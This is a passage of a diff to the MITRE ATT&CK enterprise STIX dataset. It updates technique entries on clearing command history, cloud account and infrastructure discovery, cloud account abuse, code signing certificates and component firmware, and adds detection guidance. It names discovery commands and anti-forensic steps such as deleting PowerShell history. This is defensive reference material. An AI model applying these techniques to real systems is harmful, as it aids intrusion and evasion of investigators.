ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", "id": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "type": "attack-pattern", "kill_chain_phases": [ @@ -3359,9 +3836,13 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-03-29T21:31:03.043Z", + "modified": "2020-10-16T18:09:48.686Z", "created": "2020-01-31T12:32:08.228Z", - "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Vikas Singh, Sophos", + "Emile Kenning, Sophos" + ], + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "User" @@ -3370,14 +3851,17 @@ "Host forensic analysis", "Log analysis" ], - "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the ~/.bash_history file are indicators of suspicious activity.", + "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\n\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.", "x_mitre_data_sources": [ + "Process command-line parameters", + "PowerShell logs", "File monitoring", "Authentication logs" ], "x_mitre_platforms": [ "Linux", - "macOS" + "macOS", + "Windows" ] }, { @@ -3485,6 +3969,42 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1592.004", + "url": "https://attack.mitre.org/techniques/T1592/004" + }, + { + "source_name": "ATT ScanBox", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Client Configurations", + "description": "Before compromising a victim, adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T03:52:10.774Z", + "created": "2020-10-02T16:47:16.719Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -3635,6 +4155,21 @@ "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", "url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/", "source_name": "Black Hills Red Teaming MS AD Azure, 2018" + }, + { + "source_name": "AWS List Roles", + "description": "Amazon. (n.d.). List Roles. Retrieved August 11, 2020.", + "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html" + }, + { + "source_name": "AWS List Users", + "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html", + "description": "Amazon. (n.d.). List Users. Retrieved August 11, 2020." + }, + { + "source_name": "Google Cloud - IAM Servie Accounts List API", + "url": "https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list", + "description": "Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020." } ], "object_marking_refs": [ @@ -3642,7 +4177,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Cloud Account", - "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider of SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) ", + "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)", "id": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", "type": "attack-pattern", "kill_chain_phases": [ @@ -3651,9 +4186,14 @@ "phase_name": "discovery" } ], - "modified": "2020-03-13T20:05:15.448Z", + "modified": "2020-08-13T16:53:55.390Z", "created": "2020-02-21T21:08:36.570Z", + "x_mitre_contributors": [ + "Praetorian" + ], "x_mitre_data_sources": [ + "Stackdriver logs", + "AWS CloudTrail logs", "Azure activity logs", "Office 365 account logs", "Process monitoring", @@ -3662,8 +4202,8 @@ "x_mitre_permissions_required": [ "User" ], - "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information.", - "x_mitre_version": "1.0", + "x_mitre_detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "AWS", @@ -3675,6 +4215,13 @@ ] }, { + "id": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.", + "name": "Cloud Accounts", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -3697,13 +4244,6 @@ "description": "Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Cloud Accounts", - "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.", - "id": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", "type": "attack-pattern", "kill_chain_phases": [ { @@ -3723,21 +4263,8 @@ "phase_name": "initial-access" } ], - "modified": "2020-03-23T21:59:36.729Z", + "modified": "2020-10-19T16:01:22.090Z", "created": "2020-03-13T20:36:57.378Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_permissions_required": [ - "User", - "Administrator" - ], - "x_mitre_detection": "Perform regular audits of cloud accounts to detect abnormal or malicious activity, such as accessing information outside of the normal function of the account or account usage at atypical hours.", - "x_mitre_data_sources": [ - "Azure activity logs", - "Authentication logs", - "AWS CloudTrail logs", - "Stackdriver logs" - ], "x_mitre_platforms": [ "AWS", "GCP", @@ -3745,7 +4272,20 @@ "SaaS", "Azure AD", "Office 365" - ] + ], + "x_mitre_data_sources": [ + "Azure activity logs", + "Authentication logs", + "AWS CloudTrail logs", + "Stackdriver logs" + ], + "x_mitre_detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.", + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.1" }, { "external_references": [ @@ -3789,9 +4329,12 @@ "phase_name": "discovery" } ], - "modified": "2020-03-12T19:25:12.782Z", + "modified": "2020-10-08T17:34:39.077Z", "created": "2020-02-21T21:15:33.222Z", "x_mitre_data_sources": [ + "GCP audit logs", + "Stackdriver logs", + "AWS CloudTrail logs", "Azure activity logs", "Office 365 account logs", "API monitoring", @@ -3802,11 +4345,90 @@ "User" ], "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "Office 365", - "Azure AD" + "Azure AD", + "GCP", + "SaaS", + "Azure", + "AWS" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1580", + "url": "https://attack.mitre.org/techniques/T1580" + }, + { + "source_name": "Amazon Describe Instance", + "url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html", + "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020." + }, + { + "source_name": "Amazon Describe Instances API", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html", + "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020." + }, + { + "source_name": "Google Compute Instances", + "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list", + "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020." + }, + { + "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest", + "source_name": "Microsoft AZ CLI" + }, + { + "source_name": "Expel IO Evil in AWS", + "url": "https://expel.io/blog/finding-evil-in-aws/", + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020." + }, + { + "source_name": "Mandiant M-Trends 2020", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Cloud Infrastructure Discovery", + "description": "An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.", + "id": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "modified": "2020-09-17T16:41:23.267Z", + "created": "2020-08-20T17:51:25.671Z", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_data_sources": [ + "GCP audit logs", + "Stackdriver logs", + "AWS CloudTrail logs", + "Azure activity logs" + ], + "x_mitre_platforms": [ + "AWS", + "Azure", + "GCP" ] }, { @@ -3871,7 +4493,7 @@ "phase_name": "credential-access" } ], - "modified": "2020-03-25T18:18:20.366Z", + "modified": "2020-10-15T19:39:34.817Z", "created": "2020-02-11T18:47:46.619Z", "x_mitre_contributors": [ "Praetorian" @@ -3882,7 +4504,7 @@ "Azure activity logs" ], "x_mitre_detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\n", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "AWS", @@ -4051,22 +4673,6 @@ "created": "2017-05-31T21:31:26.474Z" }, { - "created": "2020-02-05T16:27:37.784Z", - "modified": "2020-02-10T19:51:01.601Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - ], - "type": "attack-pattern", - "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", - "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", - "name": "Code Signing", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -4089,18 +4695,106 @@ "source_name": "Symantec Digital Certificates" } ], - "x_mitre_platforms": [ - "macOS", - "Windows" + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Code Signing", + "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", + "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-02-10T19:51:01.601Z", + "created": "2020-02-05T16:27:37.784Z", + "x_mitre_data_sources": [ + "Binary file metadata" ], - "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", - "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", "x_mitre_defense_bypassed": [ "Windows User Account Control" ], - "x_mitre_data_sources": [ - "Binary file metadata" + "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "macOS", + "Windows" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1587.002", + "url": "https://attack.mitre.org/techniques/T1587/002" + }, + { + "url": "https://en.wikipedia.org/wiki/Code_signing", + "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", + "source_name": "Wikipedia Code Signing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Code Signing Certificates", + "description": "Before compromising a victim, adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.", + "id": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-15T01:15:54.945Z", + "created": "2020-10-01T01:41:08.652Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.003", + "url": "https://attack.mitre.org/techniques/T1588/003" + }, + { + "url": "https://en.wikipedia.org/wiki/Code_signing", + "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", + "source_name": "Wikipedia Code Signing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Code Signing Certificates", + "description": "Before compromising a victim, adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.", + "id": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:22:21.007Z", + "created": "2020-10-01T02:11:47.237Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" ] }, { @@ -4126,7 +4820,7 @@ "phase_name": "execution" } ], - "modified": "2020-06-25T03:32:51.380Z", + "modified": "2020-10-22T16:43:39.362Z", "created": "2017-05-31T21:30:49.546Z", "x_mitre_is_subtechnique": false, "x_mitre_remote_support": false, @@ -4136,7 +4830,8 @@ "x_mitre_platforms": [ "Linux", "macOS", - "Windows" + "Windows", + "Network" ], "x_mitre_detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", "x_mitre_data_sources": [ @@ -4145,13 +4840,22 @@ "Process monitoring", "Process command-line parameters" ], - "x_mitre_version": "2.0" + "x_mitre_version": "2.1" }, { - "id": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Commonly Used Port", - "description": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)", + "created": "2017-05-31T21:30:42.657Z", + "modified": "2020-07-06T17:54:28.071Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "type": "attack-pattern", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -4164,35 +4868,26 @@ "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "revoked": false, - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "command-and-control" - } - ], - "modified": "2020-07-06T17:54:28.071Z", - "created": "2017-05-31T21:30:42.657Z", - "x_mitre_deprecated": true, - "x_mitre_is_subtechnique": false, - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ], - "x_mitre_network_requirements": true, - "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "description": "**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)", + "name": "Commonly Used Port", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", + "x_mitre_version": "1.0", "x_mitre_data_sources": [ "Packet capture", "Netflow/Enclave netflow", "Process use of network", "Process monitoring" ], - "x_mitre_version": "1.0" + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_network_requirements": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": true }, { "id": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", @@ -4434,8 +5129,7 @@ ] }, { - "id": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", - "name": "Component Firmware", + "revoked": true, "external_references": [ { "source_name": "mitre-attack", @@ -4457,12 +5151,33 @@ "source_name": "ITWorld Hard Disk Health Dec 2014" } ], - "revoked": true, + "name": "Component Firmware", + "id": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "type": "attack-pattern", - "modified": "2020-07-07T16:44:26.493Z", + "modified": "2020-10-23T15:04:14.614Z", "created": "2017-05-31T21:31:22.374Z" }, { + "created": "2019-12-19T20:21:21.669Z", + "modified": "2020-03-23T23:48:33.904Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "name": "Component Firmware", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -4484,49 +5199,29 @@ "source_name": "ITWorld Hard Disk Health Dec 2014" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Component Firmware", - "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System 